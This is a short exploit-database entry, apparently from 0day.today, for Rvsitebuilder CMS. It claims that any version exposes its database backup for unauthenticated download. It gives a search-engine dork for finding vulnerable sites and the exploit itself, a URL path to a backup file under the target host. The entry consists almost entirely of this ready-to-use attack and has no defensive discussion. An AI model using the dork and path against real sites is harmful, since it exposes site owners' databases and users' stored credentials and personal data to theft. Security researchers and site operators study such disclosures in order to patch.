id: 30211
date: 04/18/2018
title: Rvsitebuilder CMS - Database Backup Download Vulnerability
author: Hesam Bazvand
cves: 

# Exploit Title: Rvsitebuilder CMS Database Backup Download
# Exploit Author: Hesam Bazvand
# Contact: black.king066@gmail.com
# Software Link: http://www.rvsitebuilder.com
# Version: All Version
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login
  
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
 
Exploit : 
        Http://Target/rvsDbBackup.sql

#  0day.today [2023-03-24]  #